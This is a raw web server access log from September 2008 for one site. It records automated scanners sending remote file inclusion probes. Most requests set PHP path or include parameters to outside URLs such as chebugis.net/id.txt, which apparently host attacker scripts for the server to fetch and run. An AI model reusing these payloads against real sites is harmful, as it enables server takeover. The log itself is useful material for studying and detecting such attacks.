62.212.83.37 - - [12/Sep/2008:09:00:00 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.83.37 - - [12/Sep/2008:09:00:00 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.83.37 - - [12/Sep/2008:09:00:00 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:00:01 -0700] "GET /logs/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.49 - - [12/Sep/2008:09:00:01 -0700] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://thepornhandbook.com/templates/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:00:02 -0700] "GET /logs/home.php?content=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
122.49.120.85 - - [12/Sep/2008:09:00:03 -0700] "GET /home.php?content=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:00:04 -0700] "GET /logs/access_080412.log//modules/Forums/admin/errors.php?error=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:00:12 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:00:13 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89074 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:00:15 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:00:19 -0700] "GET /logs/access_080426.log//modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:00:31 -0700] "GET /logs/access_080426.log//modules/My_eGallery/public/displayCategory.php?basepath=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:09:00:46 -0700] "GET /logs/access_080822.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:01:17 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:01:18 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:01:18 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:01:29 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:01:31 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 200 89457 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:02:01 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:02:02 -0700] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.83.37 - - [12/Sep/2008:09:02:04 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.212.83.37 - - [12/Sep/2008:09:02:07 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:02:51 -0700] "GET /logs/access_070824.log HTTP/1.0" 200 40957 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:03:10 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:03:11 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:03:11 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:12 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:12 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:13 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:03:15 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
117.58.251.229 - - [12/Sep/2008:09:03:17 -0700] "GET /logs/access_080629.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://8.19.35.63/bhl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.173.72 - - [12/Sep/2008:09:03:18 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.72 - - [12/Sep/2008:09:03:19 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
117.58.251.229 - - [12/Sep/2008:09:03:20 -0700] "GET /logs/access_080524.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://8.19.35.63/bhl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:21 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:21 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:21 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:03:29 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:03:42 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:03:45 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:03:51 -0700] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:03:53 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:59 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:03:59 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:04:00 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:04:00 -0700] "GET /logs/access_080624.log//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:04:04 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:04:07 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:04:10 -0700] "GET /logs/access_080717.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:04:10 -0700] "GET /home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:04:11 -0700] "GET /logs/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:04:40 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:04:42 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.persianplatform.com//groups/gallery/id.txt?? HTTP/1.1" 200 89489 "-" "libwww-perl/5.805" "www.dmulk.com"
213.171.225.234 - - [12/Sep/2008:09:04:54 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://michelleshaprow.com/components/com_extcalendar/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:05:18 -0700] "GET /logs/access_080420.log//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:05:20 -0700] "GET /logs/access_080420.log//agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:05:29 -0700] "GET /logs/access_080702.log//config.php?_SESSION%5Bdocroot_path%5D=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:05:29 -0700] "GET /logs//config.php?_SESSION%5Bdocroot_path%5D=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:05:29 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:05:30 -0700] "GET /logs/access_080319.log//config.php?_SESSION%5Bdocroot_path%5D=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:05:30 -0700] "GET //config.php?_SESSION%5Bdocroot_path%5D=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:05:30 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:05:35 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:05:36 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:05:44 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:46 -0700] "GET /logs/access_080227.log//poll/png.php?include_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:47 -0700] "GET //poll/png.php?include_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:47 -0700] "GET /logs//poll/png.php?include_path=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:49 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:50 -0700] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:50 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:51 -0700] "GET /logs/access_080603.log/index.php?content=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:05:53 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:53 -0700] "GET /index.php?content=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 200 89067 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:05:55 -0700] "GET /logs/index.php?content=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:05:59 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [12/Sep/2008:09:06:00 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:06:05 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:06:07 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:06:10 -0700] "GET /logs/access_080822.log/index.php?content=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.51.63.60 - - [12/Sep/2008:09:06:11 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:06:17 -0700] "GET /logs/access_080604.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:06:51 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:06:52 -0700] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.64.132.254 - - [12/Sep/2008:09:06:53 -0700] "GET /logs/access_080613.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.usedcars-usa.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:07:20 -0700] "GET /logs/access_080312.log/index.php?skin_file=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:07:22 -0700] "GET /logs//modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:07:22 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:07:24 -0700] "GET /index.php?skin_file=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 200 89194 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:07:24 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89058 "-" "libwww-perl/5.805" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:07:26 -0700] "GET //modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:07:28 -0700] "GET /logs/index.php?skin_file=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.93.50 - - [12/Sep/2008:09:07:30 -0700] "GET /logs/access.log/index.php?skin_file=http://memex.c3.hu/~tata/limesurvey/tmp/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:07:49 -0700] "GET ///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 89138 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:07:50 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:07:51 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:07:54 -0700] "GET /logs///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 64722 "-" "libwww-perl/5.803" "www.dmulk.com"
211.51.63.62 - - [12/Sep/2008:09:07:59 -0700] "GET /logs/access_080622.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:08:15 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:08:21 -0700] "GET /logs///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 64722 "-" "libwww-perl/5.803" "www.dmulk.com"
87.22.37.144 - - [12/Sep/2008:09:08:22 -0700] "GET ///?_zb_path=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 200 89154 "-" "libwww-perl/5.803" "www.dmulk.com"
81.177.22.242 - - [12/Sep/2008:09:08:22 -0700] "GET /logs/access_071219.log%20///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.autobusserv.com/adspypro/stylesheets/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.18.204.197 - - [12/Sep/2008:09:08:39 -0700] "GET /logs/access_080828.log//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://reav1985.altervista.org/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:08:43 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.204.197 - - [12/Sep/2008:09:08:44 -0700] "GET /logs//phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://reav1985.altervista.org/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.204.197 - - [12/Sep/2008:09:08:44 -0700] "GET //phpraider//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://reav1985.altervista.org/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:08:47 -0700] "GET /logs/access_080822.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:09:08:54 -0700] "GET /logs/access_080828.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [12/Sep/2008:09:09:14 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.helpvenice.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:09:55 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:09:10:04 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:10:40 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.241 - - [12/Sep/2008:09:10:44 -0700] "GET /logs/access_080828.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:10:49 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:10:50 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89074 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:10:52 -0700] "GET /logs/access_080603.log/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:10:53 -0700] "GET /index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 200 89074 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:20 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:20 -0700] "GET /logs/index.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:11:28 -0700] "GET /logs/access_080428.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.234.200.155 - - [12/Sep/2008:09:11:30 -0700] "GET /logs/access_080216.log//?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.155 - - [12/Sep/2008:09:11:31 -0700] "GET //?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 200 89209 "-" "libwww-perl/5.805" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:11:32 -0700] "GET /logs/access_080430.log/home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.155 - - [12/Sep/2008:09:11:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://memex.c3.hu/~tata/limesurvey/tmp/alb??? HTTP/1.1" 200 64721 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:49 -0700] "GET /logs/access_080503.log/index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:49 -0700] "GET /logs/access_080503.log/index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:50 -0700] "GET /index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 200 89079 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:50 -0700] "GET /index.php?Language=http://chebugis.net/id.txt??? HTTP/1.1" 200 89063 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:11:53 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
